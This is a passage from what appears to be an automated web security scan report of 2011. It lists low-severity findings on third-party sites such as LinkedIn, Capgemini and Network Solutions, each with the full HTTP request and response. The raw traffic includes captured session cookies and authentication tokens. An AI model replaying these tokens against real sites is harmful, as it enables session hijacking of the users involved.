Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B

Response

HTTP/1.1 302 Moved Temporarily
Location: https://shop.winamp.com/store?Action=buy&Locale=en_US&SiteID=winamp&ThemeID=1279300&productID=103591500&quantity=1
Content-Type: text/plain
Set-Cookie: ORA_WX_SESSION="10.1.2.74:516-0#0"; path=/
Set-Cookie: JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; path=/
Set-Cookie: VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; expires=Mon, 27-Feb-2012 23:33:40 GMT; path=/
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (N;ecid=118819778357,0)
Content-Length: 0
Date: Sun, 27 Feb 2011 17:44:28 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Set-Cookie: BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000; path=/


7.59. https://sso.springsource.com/cas/login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://sso.springsource.com
Path:   /cas/login

Request

GET /cas/login HTTP/1.1
Host: sso.springsource.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=33AC2E0E7EBEB877D285F60EA5D20EF4; SESS708c3152436f834213664fa2546e7125=uh2urvu3ima6n61ue8i3usr4c5; _mkto_trk=id:649-KCC-493&token:_mch-springsource.com-1298990705899-69442

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 15:05:46 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: JSESSIONID=812CFC1B8074F96C38C36BC523679343; Path=/cas; Secure
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 5451
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
   <head>
    <title>CAS &#8
...[SNIP]...

7.60. http://t4.trackalyzer.com/trackalyze.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t4.trackalyzer.com
Path:   /trackalyze.asp

Request

GET /trackalyze.asp?r=None&p=http%3A//webcontent.alterian.com/%3Fc%3Dadwords%26l%3Dppc%26k%3Dcontent%2520management%2520system%26gclid%3DCIfL87X6pqcCFVln5QodaVjCBw&i=14512 HTTP/1.1
Host: t4.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://webcontent.alterian.com/?c=adwords&l=ppc&k=content%20management%20system&gclid=CIfL87X6pqcCFVln5QodaVjCBw
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=222260529916663

Response

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Sat, 26 Feb 2011 23:20:05 GMT
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t4.trackalyzer.com/0.gif
Content-Length: 152
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwebcontent%2Ealterian%2Ecom%2F%3Fc%3Dadwords%26l%3Dppc%26k%3Dcontent%2520management%2520system%26gclid%3DCIfL87X6pqcCFVln5QodaVjCBw; expires=Sun, 27-Feb-2011 08:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSAARACBQ=IPNIOFDANINOACENNLBJAGLJ; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t4.trackalyzer.com/0.gif">here</a>.</body>

7.61. http://tap11.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tap11.com
Path:   /

Request

GET / HTTP/1.1
Host: tap11.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Zannel-Host: appserver2.zannel.com(10.64.50.111)
Set-Cookie: StarTag-UUID=f0e1d5a4-317d-41ec-9a22-c0be74272b6f; Expires=Fri, 26-Feb-2021 13:16:00 GMT; Path=/
Set-Cookie: StartagSessionId=88da9dba-1178-4eba-9ecb-8260e9afbaaf; Path=/
Set-Cookie: StartagSessionId=31d208d0-9726-4c00-b5e8-40750e9cb834; Path=/
Set-Cookie: JSESSIONID=7FE8AFEC642C59AA1F0C4DC8738DBECD; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Tue, 01 Mar 2011 13:16:00 GMT
X-Cache: MISS from cache2
Via: 1.0 cache2 (squid/3.1.9)
Connection: close


<!DOCTYPE html>
<html>
<head>

<title>Tap11: Real-time Intelligence</title>
<meta name="description" content="Real-time intelligence and engagement platform for
...[SNIP]...

7.62. http://tap11.com/request_trial.htm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tap11.com
Path:   /request_trial.htm

Request

GET /request_trial.htm HTTP/1.1
Host: tap11.com
Proxy-Connection: keep-alive
Referer: http://tap11.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: StarTag-UUID=e3eabc37-5116-43bc-a61b-d0fc6df22c54; StartagSessionId=5ce97420-71be-439d-809d-0789b9f05183; JSESSIONID=2E466CB92351C472835510553FEA5403; __utmz=24616895.1298985422.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24616895.651104102.1298985422.1298985422.1298985422.1; __utmc=24616895; __utmb=24616895.2.9.1298985576644

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-Zannel-Host: appserver2.zannel.com(10.64.50.111)
Set-Cookie: StartagSessionId=5ce97420-71be-439d-809d-0789b9f05183; Path=/
Set-Cookie: StartagSessionId=5ce97420-71be-439d-809d-0789b9f05183; Path=/
Set-Cookie: JSESSIONID=6CF8118A959BB8BA340CABB2D473B77B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Tue, 01 Mar 2011 13:21:29 GMT
X-Cache: MISS from cache1
Via: 1.0 cache1 (squid/3.1.9)
Connection: close


<!DOCTYPE html>
<html>
<head>


<title>


tap11
</title>


<link rel="stylesheet" type="text/css"
...[SNIP]...

7.63. http://tap11.com/ws/requestTrial.json  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tap11.com
Path:   /ws/requestTrial.json

Request

POST /ws/requestTrial.json HTTP/1.1
Host: tap11.com
Proxy-Connection: keep-alive
Referer: http://tap11.com/
Origin: http://tap11.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: StarTag-UUID=e3eabc37-5116-43bc-a61b-d0fc6df22c54; StartagSessionId=5ce97420-71be-439d-809d-0789b9f05183; JSESSIONID=2E466CB92351C472835510553FEA5403; __utmz=24616895.1298985422.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24616895.651104102.1298985422.1298985422.1298985422.1; __utmc=24616895; __utmb=24616895.2.9.1298985576644
Content-Length: 0

Response

HTTP/1.0 400 Bad Request
Server: Apache-Coyote/1.1
X-Zannel-Host: appserver3.zannel.com(10.64.50.112)
Set-Cookie: StartagSessionId=5ce97420-71be-439d-809d-0789b9f05183; Path=/
Content-Type: application/json;charset=UTF-8
Content-Language: en-US
Content-Length: 18
Date: Tue, 01 Mar 2011 13:21:27 GMT
X-Cnection: close
X-Cache: MISS from cache1
Via: 1.0 cache1 (squid/3.1.9)
Connection: keep-alive

{"error":"noName"}

7.64. http://telligent.com/products/telligent_community/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://telligent.com
Path:   /products/telligent_community/

Request

GET /products/telligent_community/ HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a38+GMT; expires=Sun, 26-Feb-2012 22:04:38 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-1850=; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a38+GMT; expires=Sun, 26-Feb-2012 22:04:38 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-1850=; path=/
Set-Cookie: AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; expires=Sun, 27-Feb-2011 22:04:38 GMT; path=/
Set-Cookie: CSExtendedAnalytics=99f803f0-488b-411a-b63a-0fa1d83fd817; expires=Sun, 26-Aug-2012 21:04:38 GMT; path=/
Set-Cookie: CSExtendedAnalyticsSession=46f7cbe0-9a46-4322-bfcd-435875c557d5; expires=Sun, 27-Feb-2011 22:04:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:38 GMT
Content-Length: 61325


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.65. http://tetlaw.id.au/view/blog/prototype-class-fastinit/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://tetlaw.id.au
Path:   /view/blog/prototype-class-fastinit/

Request

GET /view/blog/prototype-class-fastinit/ HTTP/1.1
Host: tetlaw.id.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:11:05 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/5.2.3
Set-Cookie: PHPSESSID=3eef356578ea3cc43b8d47172bfb2484; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 11801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta htt
...[SNIP]...

7.66. http://widgets.dzone.com/links/widgets/zoneit.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://widgets.dzone.com
Path:   /links/widgets/zoneit.html

Request

GET /links/widgets/zoneit.html?t=1&url=http%3A%2F%2Fdavidwalsh.name%2Fgoogle-url&title=Google%20URL%20Shortener%20PHP%26nbsp%3BClass HTTP/1.1
Host: widgets.dzone.com
Proxy-Connection: keep-alive
Referer: http://davidwalsh.name/google-url
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:30:21 GMT
Server: Apache/2.2.11 (Unix) DAV/2 SVN/1.5.5 Resin/4.0.4 PHP/5.2.13
Cache-Control: private, max-age=1
Content-Language: en-US
Set-Cookie: JSESSIONID=aaaEQbwbVZHxW4wmn9N5s; path=/
Content-Type: text/html; charset=UTF-8
Expires: Sun, 27 Feb 2011 16:30:22 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 1301


<html>
<head>
<link href="/links/widgets/zoneit.css" rel="stylesheet" type="text/css"/>


<script type="text/javascript">var logged = false</script>
<script type="text/ja
...[SNIP]...

7.67. http://www.business-software.com/top-10-web-content-management-vendors.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.business-software.com
Path:   /top-10-web-content-management-vendors.php

Request

GET /top-10-web-content-management-vendors.php?track=1215&traffic=GoogleSearch&keyword=content%20management%20system&gclid=CNHU87X6pqcCFVln5QodaVjCBw HTTP/1.1
Host: www.business-software.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:19:32 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.9; Qcodo/0.3.24 (Qcodo Beta 3)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: PHPSESSID=hnk230ueo4o41ir0daauv6l6d6; path=/
Vary: User-Agent,Accept-Encoding
Content-Type: text/html
Content-Length: 32698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<html>
<head>
   <meta http-equiv="C
...[SNIP]...

7.68. http://www.cafepress.com/cp/img/spacer.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /cp/img/spacer.gif

Request

GET /cp/img/spacer.gif HTTP/1.1
Host: www.cafepress.com
Proxy-Connection: keep-alive
Referer: http://www.cafepress.com/duckduckgo
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=yukwhc55nqkjhe55cavfqmmi; cpvr=8ffd924c-ac46-4d67-a746-a756a45ebe93; cpv=7cd24b2a-54c5-4b3e-a48e-59a16bd68fb7; tfx_ltch=7%2cduckduckgo.com%2c20110227154210%2c; tfx_touch=7%2cduckduckgo.com%2c20110227154210%2c; cppid=1999; xid=0; jid=0; pid.guid=b4fe9865-eee3-4926-89ec-9fe3ef86c27e; cp-v=216508906B470ADCE1723F300108488D; cppss=0x1

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=utf-8
Location: http://content9.cpcache.com/marketplace/img/spacer.gif
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW16
Content-Length: 171
Date: Sun, 27 Feb 2011 23:42:11 GMT
Connection: close
Set-Cookie: cppss=0x1; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=yukwhc55nqkjhe55cavfqmmi; domain=cafepress.com; path=/
Cache-Control: private

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://content9.cpcache.com/marketplace/img/spacer.gif">here</a>.</h2>
</body></html>

7.69. http://www.capgemini.com/experts/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.capgemini.com
Path:   /experts/

Request

GET /experts/ HTTP/1.1
Host: www.capgemini.com
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/about/capgemini/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=13dcd029682bf5b7edb08e84b77c1646; s_cc=true; __llat=aHR0cDovL3d3dy5jYXBnZW1pbmkuY29tLz9jb21wYW55PWNhcGdlbWluaSZkYXRlPU1vbiwgMjggRmViIDIwMTEgMTc6NTA6MTYgVVRDJmlwYWRkcj1Ob25lJmJyb3dzZXI9TmV0c2NhcGUlMjA1LjAlMjAlMjhXaW5kb3dzJTNCJTIwVSUzQiUyMFdpbmRvd3MlMjBOVCUyMDYuMSUzQiUyMGVuLVVTJTI5JTIwQXBwbGVXZWJLaXQvNTM0LjEzJTIwJTI4S0hUTUwlMkMlMjBsaWtlJTIwR2Vja28lMjklMjBDaHJvbWUvOS4wLjU5Ny45OCUyMFNhZmFyaS81MzQuMTMmcmVmZXJyZXI9JmNhbXBhaWduPVdlYlNpdGUgTGVhZHM=; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 28 Feb 2011 17:57:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.8
Set-Cookie: SESS89f89b54b49f77d8abc71c3250c1fa95=8696fbae88e8a37d74293b2afd52d933; expires=Wed, 23 Mar 2011 21:30:52 GMT; path=/; domain=.capgemini.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 28 Feb 2011 17:57:32 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Length: 60337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 6]>
<html class="msie6" xmlns="http://www.w3.org/1999/xhtml"
...[SNIP]...

7.70. http://www.capgemini.com/registration/register/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.capgemini.com
Path:   /registration/register/

Request

GET /registration/register/?edit=1 HTTP/1.1
Host: www.capgemini.com
Proxy-Connection: keep-alive
Referer: http://www.capgemini.com/my-capgemini/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; __llat=aHR0cDovL3d3dy5jYXBnZW1pbmkuY29tLz9jb21wYW55PWNhcGdlbWluaSZkYXRlPU1vbiwgMjggRmViIDIwMTEgMTc6NTA6MTYgVVRDJmlwYWRkcj1Ob25lJmJyb3dzZXI9TmV0c2NhcGUlMjA1LjAlMjAlMjhXaW5kb3dzJTNCJTIwVSUzQiUyMFdpbmRvd3MlMjBOVCUyMDYuMSUzQiUyMGVuLVVTJTI5JTIwQXBwbGVXZWJLaXQvNTM0LjEzJTIwJTI4S0hUTUwlMkMlMjBsaWtlJTIwR2Vja28lMjklMjBDaHJvbWUvOS4wLjU5Ny45OCUyMFNhZmFyaS81MzQuMTMmcmVmZXJyZXI9JmNhbXBhaWduPVdlYlNpdGUgTGVhZHM=; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: nginx/0.6.35
Date: Mon, 28 Feb 2011 17:53:49 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.2.8
Set-Cookie: PHPSESSID=13dcd029682bf5b7edb08e84b77c1646; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-Control: no-store
Edge-Control: no-store
Content-Length: 51150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if IE 6]>
<html class="msie6" xmlns="http://www.w3.org/1999/xh
...[SNIP]...

7.71. http://www.fusionbot.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.fusionbot.com
Path:   /

Request

GET / HTTP/1.1
Host: www.fusionbot.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 01 Mar 2011 02:03:51 GMT
Pragma: no-cache
Last-Modified: Sun, 27 Feb 2011 15:15:51 GMT
Content-Length: 37625
Content-Type: text/html
Expires: Tue, 01 Mar 2011 02:02:51 GMT
Set-Cookie: fusionbot=fbdirect; expires=Tue, 01-Mar-2011 06:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCARBRRAC=GLIHDGPCLMDCDNBPFIKPKPEM; path=/
Cache-control: no-cache


<html>
<head>
<base href="http://www.fusionbot.com/">
<title>Free Site Search Engine by FusionBot.com - Website Search &amp; Sitemap</title>
<meta name="description" content="Add a free site sea
...[SNIP]...

7.72. http://www.jrank.org/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.jrank.org
Path:   /

Request

GET / HTTP/1.1
Host: www.jrank.org
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: _jrank_session_id=2b70e8e2be096885db9cb0d46f33580f; domain=jrank.org; path=/
Status: 200 OK
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15
ETag: "87ee057916f1dc7ed166be73ecc1b8ca"
X-Runtime: 3ms
Cache-Control: private, max-age=0, must-revalidate
Server: nginx/0.8.53 + Phusion Passenger 2.2.15 (mod_rails/mod_rack)
Content-Length: 12372

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <link href="/stylesheets/all.css?1296311965" media="all" rel="stylesheet" t
...[SNIP]...

7.73. http://www.linkedin.com/cws/share-count  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.linkedin.com
Path:   /cws/share-count

Request

GET /cws/share-count?url=http%3A%2F%2Fwww.project-syndicate.org%2Fcommentary%2Fashour1%2FEnglish HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/commentary/ashour1/English
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID="ajax:8910050297415305160"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:ZL7F2hkvdphl1SDDHCenppkVShHkd5YaokePexTB1who1iPO-U02_N:1298773211:23cce2515469802f54958223e49cdd58d19c5ebd"; Version=1; Max-Age=1799; Expires=Sun, 27-Feb-2011 02:50:10 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: visit=G; Expires=Fri, 17-Mar-2079 05:34:18 GMT; Path=/
Set-Cookie: bcookie="v=1&44133ae3-773a-43b4-a5ae-24d81d7c97f0"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 17-Mar-2079 05:34:18 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Language: en-US
Date: Sun, 27 Feb 2011 02:20:10 GMT
Content-Length: 107

IN.Tags.Share.handleCount({"count":5,"url":"http://www.project-syndicate.org/commentary/ashour1/English"});

7.74. http://www.networksolutions.com/domain-name-registration/RV8.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.networksolutions.com
Path:   /domain-name-registration/RV8.jsp

Request

GET /domain-name-registration/RV8.jsp?siteid=8&channelid=P13C8S570N0B9A1D661E0000V104&promo=RV699SALE3&referID=ns_google_domains_tp&k=domain(){Phone-RV}&adid=5954407096&plid=&gclid=CLqQ3K_hqKcCFc9w5QodUFfOCg&clickid=1294340992 HTTP/1.1
Host: www.networksolutions.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Sun, 27 Feb 2011 16:30:51 GMT
Set-cookie: JSESSIONID=7f54a2c886d230536bf4e8264959; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
X-powered-by: Servlet/2.5
Set-cookie: JROUTE=qevx; Version=1; Comment=Sun+ONE+Application+Server+Session+Tracking+Cookie; Path=/
Set-cookie: vrsnsf=7f54a2c886d230536bf4e8264959; Expires=Fri, 17-Mar-2079 19:44:57 GMT; Path=/
Set-cookie: landing=P13C8S570N0B9A1D661E0000V104; Expires=Tue, 29-Mar-2011 16:30:51 GMT; Path=/
Content-type: text/html;charset=UTF-8
Date: Sun, 27 Feb 2011 16:30:51 GMT
Vary: accept-encoding
Content-Length: 47890

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html;charset=utf-8">

